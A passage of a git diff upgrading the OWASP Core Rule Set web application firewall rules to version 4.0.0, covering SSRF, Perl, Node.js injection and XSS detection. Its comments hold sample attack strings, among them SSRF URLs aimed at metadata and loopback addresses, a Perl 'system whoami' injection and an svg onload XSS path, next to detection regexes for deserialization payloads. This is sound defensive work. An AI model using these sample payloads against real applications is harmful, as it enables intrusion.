(?:(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}|(?:[0-9a-fA-F]{1,4}:){1,7}:|(?:[0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|(?:[0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|(?:[0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|(?:[0-9a-fA-F]{1,4}:){1,3}(?::[0-9a-fA-F]{1,4}){1,4}|(?:[0-9a-fA-F]{1,4}:){1,2}(?::[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:(?:(?::[0-9a-fA-F]{1,4}){1,6})|:(?:(?::[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(?::[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(?::0{1,4}){0,1}:){0,1}(?:(?:25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)|(?:[0-9a-fA-F]{1,4}:){1,4}:(?:(?:25[0-5]|(2[0-4]|1{0,1}\d){0,1}\d)\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)) +# http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4 - ((?:[0-9a-fA-F]{1,4}:){6}(?:(25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)) +# http://[::] +# http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ (already covered by RFI rule 931100) +# http://127.88.23.245:22/?@google.com:80/ (already covered by RFI rule 931100) +# http://127.88.23.245:22/#@www.google.com:80/ (already covered by RFI rule 931100) +# http://google.com:80\\@127.88.23.245:22/ (already covered by RFI rule 931100) +# http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ +# http://google.com:80+&@google.com:80#+@127.88.23.245:22/ +# +# Regular expression generated from regex-assembly/934120.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934120 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)((?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip)://(?:[0-9]{10}|(?:0x[0-9a-f]{2}\.){3}0x[0-9a-f]{2}|0x(?:[0-9a-f]{8}|[0-9a-f]{16})|(?:0{1,4}[0-9]{1,3}\.){3}0{1,4}[0-9]{1,3}|[0-9]{1,3}\.(?:[0-9]{1,3}\.[0-9]{5}|[0-9]{8})|(?:\x5c\x5c[\-0-9a-z]\.?_?)+|\[[0-:a-f]+(?:[\.0-9]+|%[0-9A-Z_a-z]+)?\]|[a-z][\--\.0-9A-Z_a-z]{1,255}:[0-9]{1,5}(?:#?[\s\v]*&?@(?:(?:[0-9]{1,3}\.){3}[0-9]{1,3}|[a-z][\--\.0-9A-Z_a-z]{1,255}):[0-9]{1,5}/?)+|[\.0-9]{0,11}(?:\xe2(?:\x91[\xa0-\xbf]|\x92[\x80-\xbf]|\x93[\x80-\xa9\xab-\xbf])|\xe3\x80\x82)+))" \ + "id:934120,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Server Side Request Forgery (SSRF) Attack: URL Parameter using IP Address',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-ssrf',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/664',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# [ Perl generic RCE signatures ] +# +# Detects Perl-based injection attacks. +# Example: @{[system whoami]} +# +# Regular expression generated from regex-assembly/934140.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934140 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx @\{.*\}" \ + "id:934140,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Perl Injection Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-perl',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) +# + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +# +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-934-APPLICATION-ATTACK-GENERIC" diff --git a/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf b/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf deleted file mode 100644 index a8ab2f379b..0000000000 --- a/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf +++ /dev/null @@ -1,95 +0,0 @@ -# ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 -# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. -# -# The OWASP ModSecurity Core Rule Set is distributed under -# Apache Software License (ASL) version 2 -# Please see the enclosed LICENSE file for full details. -# ------------------------------------------------------------------------ - -# -# -= Paranoia Level 0 (empty) =- (apply unconditionally) -# - - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" -# -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) -# - - -# [ Insecure unserialization / generic RCE signatures ] -# -# Libraries performing insecure unserialization: -# - node-serialize: _$$ND_FUNC$$_ (CVE-2017-5941) -# - funcster: __js_function -# -# See: -# https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ -# https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/ -# -# Some generic snippets used: -# - function() { -# - new Function( -# - eval( -# - String.fromCharCode( -# -# Last two are used by nodejsshell.py, -# https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py -# -# As base64 is sometimes (but not always) used to encode serialized values, -# use multiMatch and t:base64decode. -# -# Regexp generated from util/regexp-assemble/regexp-934100.data using Regexp::Assemble. -# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. - -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:(?:_(?:\$\$ND_FUNC\$\$_|_js_function)|(?:new\s+Function|\beval)\s*\(|String\s*\.\s*fromCharCode|function\s*\(\s*\)\s*{|this\.constructor)|module\.exports\s*=)" \ - "id:934100,\ - phase:2,\ - block,\ - capture,\ - t:none,t:urlDecodeUni,t:base64Decode,\ - msg:'Node.js Injection Attack',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-javascript',\ - tag:'platform-multi',\ - tag:'attack-rce',\ - tag:'attack-injection-nodejs',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - multiMatch,\ - setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" -# -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) -# - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" -# -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) -# - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" -# -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) -# - - - -# -# -= Paranoia Levels Finished =- -# -SecMarker "END-REQUEST-934-APPLICATION-ATTACK-NODEJS" diff --git a/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf b/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf index 7f9f807419..150748716c 100644 --- a/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf +++ b/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -13,13 +14,55 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # +# In CRS v4.0, we have added REQUEST_FILENAME to the list of variables to +# be checked for XSS to catch path-based XSS exploits such as: +# /index.php/%3Csvg/onload=alert() +# +# However, the REQUEST_FILENAME is always populated (while ARGS etc. are +# only set on some requests) and we found that always checking the +# REQUEST_FILENAME has a significant performance impact. +# Therefore, we are disabling the REQUEST_FILENAME XSS checks when the +# REQUEST_FILENAME is clearly not containing special characters necessary +# for a successful XSS. +# +# Some bona-fide REQUEST_FILENAMEs will still contain special characters +# and will be checked by the rules, but it will be a much lower amount, +# and that is a trade-off we are willing to make. +# +# So, we check for XSS in REQUEST_FILENAME only if it contains +# other characters than alphanumeric characters, hyphens, underscores etc. +# typically found in filenames and paths: +# +# - ascii 20 (whitespace) +# - ascii 45-47 (- . /) +# - ascii 48-57 (0-9) +# - ascii 65-90 (A-Z) +# - ascii 95 (underscore) +# - ascii 97-122 (a-z) +# +# If just these characters are present, we make use of a special tag to remove +# REQUEST_FILENAME from the target list of all the 941xxx rules starting 941100. +# +# Please note that it would be preferable to start without REQUEST_FILENAME in the +# target list and to add it on a case to case base, but the rule language does not +# support this feature at runtime. +# +SecRule REQUEST_FILENAME "!@validateByteRange 20, 45-47, 48-57, 65-90, 95, 97-122" \ + "id:941010,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=xss-perf-disable;REQUEST_FILENAME" + + # # -=[ Libinjection - XSS Detection ]=- # @@ -32,7 +75,7 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,skipAf # REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent| # ARGS_NAMES|ARGS|XML:/* # -# 941101: PL2 : REQUEST_HEADERS:Referer +# 941101: PL2 : REQUEST_FILENAME|REQUEST_HEADERS:Referer # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@detectXSS" \ "id:941100,\ @@ -45,14 +88,14 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # @@ -72,51 +115,25 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - - -# -# -=[ XSS Filters - Category 2 ]=- -# XSS vectors making use of event handlers like onerror, onload etc, e.g., -# -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\"'`;\/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]on[a-zA-Z]+[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=" \ - "id:941120,\ - phase:2,\ - block,\ - capture,\ - t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ - msg:'XSS Filter - Category 2: Event Handler Vector',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-xss',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ XSS Filters - Category 3 ]=- # -# Regexp generated from util/regexp-assemble/regexp-941130.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-941130.data +# Regular expression generated from regex-assembly/941130.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 941130 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\S](?:!ENTITY\s+(?:\S+|%\s+\S+)\s+(?:PUBLIC|SYSTEM)|x(?:link:href|html|mlns)|data:text\/html|pattern\b.*?=|formaction|\@import|;base64)\b" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i).(?:\b(?:x(?:link:href|html|mlns)|data:text/html|formaction|pattern\b.*?=)|!ENTITY[\s\v]+(?:%[\s\v]+)?[^\s\v]+[\s\v]+(?:SYSTEM|PUBLIC)|@import|;base64)\b" \ "id:941130,\ phase:2,\ block,\ @@ -128,40 +145,43 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ XSS Filters - Category 4 ]=- # XSS vectors making use of javascript uri and tags, e.g.,

+# https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#css-expressions-ie7 +# https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#behaviors-for-older-modes-of-ie +# examples: https://regex101.com/r/FFEpsh/1 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\b[^>]*?>[\s\S]*?|(?:=|U\s*?R\s*?L\s*?\()\s*?[^>]*?\s*?S\s*?C\s*?R\s*?I\s*?P\s*?T\s*?:)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[a-z]+=(?:[^:=]+:.+;)*?[^:=]+:url\(javascript" \ "id:941140,\ phase:2,\ block,\ capture,\ - t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,t:removeWhitespace,\ msg:'XSS Filter - Category 4: Javascript URI Vector',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # @@ -170,14 +190,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H # # [NoScript InjectionChecker] HTML injection # -# Regexp generated from util/regexp-assemble/regexp-941160.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-941160.data -# Note that after assemble an ignore case flag (i) is added to the to the Regexp::Assemble output: -# Add ignore case flag between '?' and ':': "(?i:...)" +# Regular expression generated from regex-assembly/941160.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 941160 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)(?:on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|(?:peech|ound)(?:start|end)|u(?:ccess|spend|bmit)|croll|how)|m(?:o(?:z(?:(?:pointerlock|fullscreen)(?:change|error)|(?:orientation|time)change|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|b(?:e(?:fore(?:(?:(?:de)?activa|scriptexecu)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trieving|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ransition(?:cancel|end|run)|ime(?:update|out)|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom)|s(?:tyle|rc)|background|formaction|lowsrc|ping)[\s\x08]*?=|<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?(?:(?:a\W*?(?:n\W*?i\W*?m\W*?a\W*?t\W*?e|p\W*?p\W*?l\W*?e\W*?t|u\W*?d\W*?i\W*?o)|b\W*?(?:i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s|a\W*?s\W*?e|o\W*?d\W*?y)|i?\W*?f\W*?r\W*?a\W*?m\W*?e|o\W*?b\W*?j\W*?e\W*?c\W*?t|i\W*?m\W*?a?\W*?g\W*?e?|e\W*?m\W*?b\W*?e\W*?d|p\W*?a\W*?r\W*?a\W*?m|v\W*?i\W*?d\W*?e\W*?o|l\W*?i\W*?n\W*?k)[^>\w]|s\W*?(?:c\W*?r\W*?i\W*?p\W*?t|t\W*?y\W*?l\W*?e|e\W*?t[^>\w]|v\W*?g)|m\W*?(?:a\W*?r\W*?q\W*?u\W*?e\W*?e|e\W*?t\W*?a[^>\w])|f\W*?o\W*?r\W*?m))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)<[^0-9<>A-Z_a-z]*(?:[^\s\v\"'<>]*:)?[^0-9<>A-Z_a-z]*[^0-9A-Z_a-z]*?(?:s[^0-9A-Z_a-z]*?(?:c[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?p[^0-9A-Z_a-z]*?t|t[^0-9A-Z_a-z]*?y[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e|v[^0-9A-Z_a-z]*?g|e[^0-9A-Z_a-z]*?t[^0-9>A-Z_a-z])|f[^0-9A-Z_a-z]*?o[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?m|d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?o[^0-9A-Z_a-z]*?g|m[^0-9A-Z_a-z]*?(?:a[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?q[^0-9A-Z_a-z]*?u[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?e|e[^0-9A-Z_a-z]*?t[^0-9A-Z_a-z]*?a[^0-9>A-Z_a-z])|(?:l[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?k|o[^0-9A-Z_a-z]*?b[^0-9A-Z_a-z]*?j[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?c[^0-9A-Z_a-z]*?t|e[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?b[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?d|a[^0-9A-Z_a-z]*?(?:p[^0-